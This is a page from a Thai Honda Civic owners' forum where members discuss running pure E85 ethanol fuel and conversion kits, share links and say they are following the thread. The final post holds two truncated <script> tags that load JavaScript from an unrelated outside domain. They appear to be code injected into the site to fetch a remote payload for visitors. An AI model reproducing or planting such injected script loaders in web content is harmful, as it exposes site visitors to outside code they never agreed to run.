ชื่อเล่น: ตัวเล็ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 340

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 330
ให้คำขอบคุณ: 333

ที่อยู่: บางน้ำจืด แถวพันท้าย
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พฤหัส, 1 มีนา 2012 11:30 - ผมเติม E85 เพียวๆเลยครับ
กล่องมันเป็นแค่ตัวช่วยให้สตาร์ทติดง่ายช่ายไหมครับ
เพราะว่า E85 มีเบนซินแค่ 15%ทำให้สตาร์ทยาก (ผมเข้าใจถูกไหม)
ได้รับคำขอบคุณจาก: slek 
MIGGERS


เข้าร่วม: 16 มีนา 2011
ตอบ: 268

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 368
ให้คำขอบคุณ: 38

ที่อยู่: Bangkok
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 1 มีนา 2012 15:13 - ผมเติม E85 เพียวๆเลยครับ
ติดตามอยู่ครับ ได้ผลยังไงแล้วบอกด้วย (อ่านแล้วใจกล้าขึ้น ว่าจะไปลอง E20 มั่ง 555+)
ได้รับคำขอบคุณจาก: slek 
sanyaaa


เข้าร่วม: 16 มกรา 2012
ตอบ: 277

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 42

ที่อยู่: โกสุมร่วมใจ ห้า ดอนเมือง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 1 มีนา 2012 19:52 - ผมเติม E85 เพียวๆเลยครับ
อยากให้ลองอ่าน และคิดตาม http://savcocarwash.com/index.php?option=com_content&view=article&id=103:auto-e-kitreal&catid=43:2009-09-04-13-49-12&Itemid=86
ได้รับคำขอบคุณจาก: วุฒิชัย  slek  Phetcharat  Leonic_l  สมชาย 
THAM


ชื่อเล่น: ตั้ม

เข้าร่วม: 05 ธันวา 2010
ตอบ: 951

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 946
ให้คำขอบคุณ: 777

ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 2 มีนา 2012 09:15 - ผมเติม E85 เพียวๆเลยครับ
ขอติดตามข้อมูลซัก 1 ปีน่ะครับ
ได้รับคำขอบคุณจาก: slek 
Cra2yLov3


ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

ที่อยู่: สุราษฎร์ - กทม (ลาดพร้าว)
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 2 มีนา 2012 09:22 - ผมเติม E85 เพียวๆเลยครับ
ติดตามต่อไป
ได้รับคำขอบคุณจาก: slek 
sanyaaa


เข้าร่วม: 16 มกรา 2012
ตอบ: 277

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 42

ที่อยู่: โกสุมร่วมใจ ห้า ดอนเมือง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 2 มีนา 2012 13:27 - ผมเติม E85 เพียวๆเลยครับ
ลองติดตามเวปของบางจาก
http://www.greentechthailand.com/ถามตอบเรื่องน้ำมัน/
ได้รับคำขอบคุณจาก: slek  นกซาซ่าส์ โซดาสิงห์ 
bankbankja


เข้าร่วม: 18 มกรา 2011
ตอบ: 14

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 4
ให้คำขอบคุณ: 0

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 2 มีนา 2012 15:05 - ผมเติม E85 เพียวๆเลยครับ
chang167 พิมพ์ว่า:
ผมอยากได้ไอ้กล่อง kit แบบที่ แปลงจากน้ำมัน ให้มันเติมน้ำเปล่าเฉยๆแล้ววิ่งได้อ่าครับ
[/ color] ผมก็หาอยู่เหมือนกันนะครับเจ้ากล่องเนี้ยๆๆ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: slek 
ตอบ
หน้า 9 จาก 79
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.